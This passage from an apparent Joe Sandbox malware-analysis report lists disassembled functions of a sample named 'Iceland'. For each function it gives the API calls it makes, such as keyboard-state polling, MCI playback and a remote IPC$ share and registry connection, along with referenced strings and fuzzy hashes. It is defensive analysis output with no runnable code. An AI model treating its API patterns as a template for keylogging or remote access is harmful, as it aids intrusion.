IsWindow.USER32 ref: 0097F0A1
EndDialog.USER32(00000000), ref: 0097F0B2

Strings

BUTTON, xrefs: 0097F030

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: c2dbd6ed09e216419e475e89f0a1841708ed31aad81064e060902563a5c7ebb1
Instruction ID: 3e49f992dff1607a3b3c8f3f682b71d55787ea6c3855f6008d8b9afdd98477f5
Opcode Fuzzy Hash: c2dbd6ed09e216419e475e89f0a1841708ed31aad81064e060902563a5c7ebb1
Instruction Fuzzy Hash: C02192B2529244BFEB116F30ECCEB267B6DFB4AB45B00D025F50A96772DB754C00AA91

Function 0097F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0097F374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0097F38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0097F39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0097F3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0097F3BE

Strings

open , xrefs: 0097F323
alias PlayMe, xrefs: 0097F34D
close PlayMe, xrefs: 0097F385, 0097F3B2
play PlayMe, xrefs: 0097F3B9
play PlayMe wait, xrefs: 0097F3A8
status PlayMe mode, xrefs: 0097F36F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: fbfc0a299dab3cd30639a48a2123a9ea2021d610602273fe4b806c498d1fa445
Instruction ID: ee45662ebe44b0108155258362932046b501fc5b10b949a0946d2e8da8ecd8f5
Opcode Fuzzy Hash: fbfc0a299dab3cd30639a48a2123a9ea2021d610602273fe4b806c498d1fa445
Instruction Fuzzy Hash: 5B11E332A9422C79D720A3A19C6AFFFAA7CEBC2B84F00442B7401E20D0EAA01D45C5B0

Function 0097A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0097A9D9
SetKeyboardState.USER32(?), ref: 0097AA44
GetAsyncKeyState.USER32(000000A0), ref: 0097AA64
GetKeyState.USER32(000000A0), ref: 0097AA7B
GetAsyncKeyState.USER32(000000A1), ref: 0097AAAA
GetKeyState.USER32(000000A1), ref: 0097AABB
GetAsyncKeyState.USER32(00000011), ref: 0097AAE7
GetKeyState.USER32(00000011), ref: 0097AAF5
GetAsyncKeyState.USER32(00000012), ref: 0097AB1E
GetKeyState.USER32(00000012), ref: 0097AB2C
GetAsyncKeyState.USER32(0000005B), ref: 0097AB55
GetKeyState.USER32(0000005B), ref: 0097AB63

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: e4d7ad92556dceb71fc2be70417843244f24f1f211e1cea386eaaea1992b73d0
Instruction ID: b2d8ea43e94c7d03037530758c9e900b25dab2af751e2a3564552648cdcac82a
Opcode Fuzzy Hash: e4d7ad92556dceb71fc2be70417843244f24f1f211e1cea386eaaea1992b73d0
Instruction Fuzzy Hash: E6512A22A0478429FB35D7748851BEEBFB98F82340F08C599D5CA4B1C2DA649B4CC7A3

Function 0097662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00976649
GetWindowRect.USER32(00000000,?), ref: 00976662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 009766C0
GetDlgItem.USER32(?,00000002), ref: 009766D0
GetWindowRect.USER32(00000000,?), ref: 009766E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00976736
GetDlgItem.USER32(?,000003E9), ref: 00976744
GetWindowRect.USER32(00000000,?), ref: 00976756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00976798
GetDlgItem.USER32(?,000003EA), ref: 009767AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 009767C1
InvalidateRect.USER32(?,00000000,00000001), ref: 009767CE

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 7d821b7a1861104306942447c348aa991a117fe9cda82331b9a483933ea5ece9
Instruction ID: 4624bbb01ba9e18ebf8a8e6107bcfb4b9438c89aaf85a8f753c2c6783fa4d366
Opcode Fuzzy Hash: 7d821b7a1861104306942447c348aa991a117fe9cda82331b9a483933ea5ece9
Instruction Fuzzy Hash: 6D5151B1A10605AFDF08CF68CD85AAE7BB9FF49314F108128F50AE7690D770AD00CB90

Function 0091146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00911802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00911488,?,00000000,?,?,?,?,0091145A,00000000,?), ref: 00911865

DestroyWindow.USER32(?), ref: 00911521
KillTimer.USER32(00000000,?,?,?,?,0091145A,00000000,?), ref: 009115BB
DestroyAcceleratorTable.USER32(00000000), ref: 009529B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0091145A,00000000,?), ref: 009529E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0091145A,00000000,?), ref: 009529F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0091145A,00000000), ref: 00952A15
DeleteObject.GDI32(00000000), ref: 00952A27

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: da68fd9fa361b32f1d00a80de6776597c075f49602261343db548f2d55760b3d
Instruction ID: c8c8c72cc5fb19f06576f8f1a3106ccbffa597239067b7730384760e073ae98b
Opcode Fuzzy Hash: da68fd9fa361b32f1d00a80de6776597c075f49602261343db548f2d55760b3d
Instruction Fuzzy Hash: A461AF31615719EFDB39CF15DA88B6977BAFF81312F109418E5434AAB1C774AC84EB80

Function 00912128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00912234: GetWindowLongW.USER32(?,000000EB), ref: 00912242

GetSysColor.USER32(0000000F), ref: 00912152

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: b8d4d51421b012937a61be67ffe6d2312b10e23cf66beb03ae634449c3c27e90
Instruction ID: d15bcf716556dac30d652ffe8f4da26ff6500ca0f659fa316662bc53c2d16e80
Opcode Fuzzy Hash: b8d4d51421b012937a61be67ffe6d2312b10e23cf66beb03ae634449c3c27e90
Instruction Fuzzy Hash: 5A41B531209648BFDB24AF289C44BF93779EB42361F144615FAA2872E1C7319D92E750

Function 0097A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00960D31,00000001,0000138C,00000001,00000000,00000001,?,0098EEAE,009E2430), ref: 0097A091
LoadStringW.USER32(00000000,?,00960D31,00000001), ref: 0097A09A

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00960D31,00000001,0000138C,00000001,00000000,00000001,?,0098EEAE,009E2430,?), ref: 0097A0BC
LoadStringW.USER32(00000000,?,00960D31,00000001), ref: 0097A0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0097A1E0

Strings

^ ERROR, xrefs: 0097A175
Error: , xrefs: 0097A197
Line %d (File "%s"):, xrefs: 0097A109
%s (%d) : ==> %s: %s %s, xrefs: 0097A1C4
Line %d:, xrefs: 0097A11A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 6dc957fa411d2f9858f21274fab39f8b12c6d26deac8356d34ac604589f31f66
Instruction ID: 4fc6b6ec99277cdbf6740fe4e8216279bc4035348c12ad9d10d5c41483f1857e
Opcode Fuzzy Hash: 6dc957fa411d2f9858f21274fab39f8b12c6d26deac8356d34ac604589f31f66
Instruction Fuzzy Hash: 0941627294410DAACB05FBE0DD86EEEB779AF98340F504065F505B2092EB355F49CBA1

Function 00970FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00918577: _wcslen.LIBCMT ref: 0091858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00971093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009710AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009710CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009710F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0097111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00971128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0097112D

Strings

\CLSID, xrefs: 00971015
SOFTWARE\Classes\, xrefs: 00970FFF
\IPC$, xrefs: 00971075

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: eb41957b749a2f2faba4234eeed3a6b1c3b419fa40a019a85314561c979230a3
Instruction ID: a7db155102b182db46bccd88645d5a4c63424f11e9858c23cd5e7350c59d8981
Opcode Fuzzy Hash: eb41957b749a2f2faba4234eeed3a6b1c3b419fa40a019a85314561c979230a3
Instruction Fuzzy Hash: 19411872D1422DABCF11EBA4DC95DEEB7B9FF44740F408069E905A31A0EB309E45CB90

Function 009A4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009A4AD9
CreateCompatibleDC.GDI32(00000000), ref: 009A4AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009A4AF3
SelectObject.GDI32(00000000,00000000), ref: 009A4AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 009A4B06
DeleteDC.GDI32(00000000), ref: 009A4B10
GetWindowLongW.USER32(?,000000EC), ref: 009A4B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 009A4B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 009A4B3C

Strings

static, xrefs: 009A4A71

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: d40cee791c029bd59680a5e71f03723a75bc31e5b3e0e9a571625e3877e17f73
Instruction ID: 52b3a02c373a4ddcc9596c583407f00361e04f730e9a94e917e086bf330c0db2
Opcode Fuzzy Hash: d40cee791c029bd59680a5e71f03723a75bc31e5b3e0e9a571625e3877e17f73
Instruction Fuzzy Hash: 2E315872115219BBDF129FA4DC08FDE3BA9FF4A324F110211FA16A61A0C775D860EBE4

Function 0099468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009946B9
CoInitialize.OLE32(00000000), ref: 009946E7
CoUninitialize.OLE32 ref: 009946F1
_wcslen.LIBCMT ref: 0099478A
GetRunningObjectTable.OLE32(00000000,?), ref: 0099480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00994932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0099496B
CoGetObject.OLE32(?,00000000,009B0B64,?), ref: 0099498A
SetErrorMode.KERNEL32(00000000), ref: 0099499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00994A21
VariantClear.OLEAUT32(?), ref: 00994A35

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 0b6ccd9f473d7361171194b7d789e7d613b8ca529a73ad961f495f6a728dc37e
Instruction ID: cb994c106f17e76531d8622a81a104e151aa2ccc828a27a25b50ce712002ee02
Opcode Fuzzy Hash: 0b6ccd9f473d7361171194b7d789e7d613b8ca529a73ad961f495f6a728dc37e
Instruction Fuzzy Hash: 5FC134716083059F8B01DF68C884D6BB7E9FF89748F10491DF98A9B260DB30ED46CB92

Function 009884DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00988538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009885D4
SHGetDesktopFolder.SHELL32(?), ref: 009885E8
CoCreateInstance.OLE32(009B0CD4,00000000,00000001,009D7E8C,?), ref: 00988634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009886B9
CoTaskMemFree.OLE32(?,?), ref: 00988711
SHBrowseForFolderW.SHELL32(?), ref: 0098879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009887BF
CoTaskMemFree.OLE32(00000000), ref: 009887C6
CoTaskMemFree.OLE32(00000000), ref: 0098881B
CoUninitialize.OLE32 ref: 00988821

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 136e379955daa39d47a6589426d2a217199d2f5252134862c6c7dcf6ef186a2f
Instruction ID: 22d4305a28cdefdd079ecf29b129762f1f2684203b2911c69b3cd02585e41217
Opcode Fuzzy Hash: 136e379955daa39d47a6589426d2a217199d2f5252134862c6c7dcf6ef186a2f
Instruction Fuzzy Hash: E8C1FA75A00109AFCB14DFA4C888DAEBBF9FF49304B548499E51ADB761DB30ED45CB90

Function 00970378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0097039F
SafeArrayAllocData.OLEAUT32(?), ref: 009703F8
VariantInit.OLEAUT32(?), ref: 0097040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0097042A
VariantCopy.OLEAUT32(?,?), ref: 0097047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00970491
VariantClear.OLEAUT32(?), ref: 009704A6
SafeArrayDestroyData.OLEAUT32(?), ref: 009704B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009704BC
VariantClear.OLEAUT32(?), ref: 009704CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009704D9

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: c326d4b349b116871f4d5365fe37e61f37699181b4021649ef45415c2f7514cc
Instruction ID: 6ac90e404f66f2322b6a20aa6eac5a53181143005dae04dc81dcfaac5355b17b
Opcode Fuzzy Hash: c326d4b349b116871f4d5365fe37e61f37699181b4021649ef45415c2f7514cc
Instruction Fuzzy Hash: BD415175A04219DFCB10DF64D8449ED7BB9FF88344F008465E95AA72B1D734A945CB90

Function 0097A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0097A65D
GetAsyncKeyState.USER32(000000A0), ref: 0097A6DE
GetKeyState.USER32(000000A0), ref: 0097A6F9
GetAsyncKeyState.USER32(000000A1), ref: 0097A713
GetKeyState.USER32(000000A1), ref: 0097A728
GetAsyncKeyState.USER32(00000011), ref: 0097A740
GetKeyState.USER32(00000011), ref: 0097A752
GetAsyncKeyState.USER32(00000012), ref: 0097A76A
GetKeyState.USER32(00000012), ref: 0097A77C
GetAsyncKeyState.USER32(0000005B), ref: 0097A794
GetKeyState.USER32(0000005B), ref: 0097A7A6

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 355b82e2bcd769e419ee96352461f7652cd2ec78f5556a8f785d446de82c8c74
Instruction ID: 040c830460d0181736d645fbc056dfe8ed7028d2495f5f470e2c620062126364
Opcode Fuzzy Hash: 355b82e2bcd769e419ee96352461f7652cd2ec78f5556a8f785d446de82c8c74
Instruction Fuzzy Hash: 0A41D6659057C96DFF39976088043ADBEB86F92304F08C05DD5CA4A5C2EB949DC8CBA3

Function 00999730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00999750

Part of subcall function 00979805: _wcslen.LIBCMT ref: 00979828

_wcslen.LIBCMT ref: 009997AB
_wcslen.LIBCMT ref: 009997F9
_wcslen.LIBCMT ref: 00999839
_wcslen.LIBCMT ref: 009998CB

Strings

winapi, xrefs: 009997F3, 009997F8
none, xrefs: 009998C2, 009998C7
cdecl, xrefs: 009997A5, 009997AA
stdcall, xrefs: 00999833, 00999838

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: cd635d00b972827503289d0e58995192dccd0355ae26c4561e003d434d0bfc25
Instruction ID: dbcee956892ffa1aee9ad154653b5a3f727a612f6dda543580f996f508518dc4
Opcode Fuzzy Hash: cd635d00b972827503289d0e58995192dccd0355ae26c4561e003d434d0bfc25
Instruction Fuzzy Hash: E451C331A0011AABCF14DFADC9519FEB7A9BF65364B60422DE866E7384DB31DE40C790

Function 00994189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 009941D1
CoUninitialize.OLE32 ref: 009941DC
CoCreateInstance.OLE32(?,00000000,00000017,009B0B44,?), ref: 00994236
IIDFromString.OLE32(?,?), ref: 009942A9
VariantInit.OLEAUT32(?), ref: 00994341
VariantClear.OLEAUT32(?), ref: 00994393

Strings

NULL Pointer assignment, xrefs: 0099427B
Failed to create object, xrefs: 00994241, 009942F7
Invalid parameter, xrefs: 009942C2

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

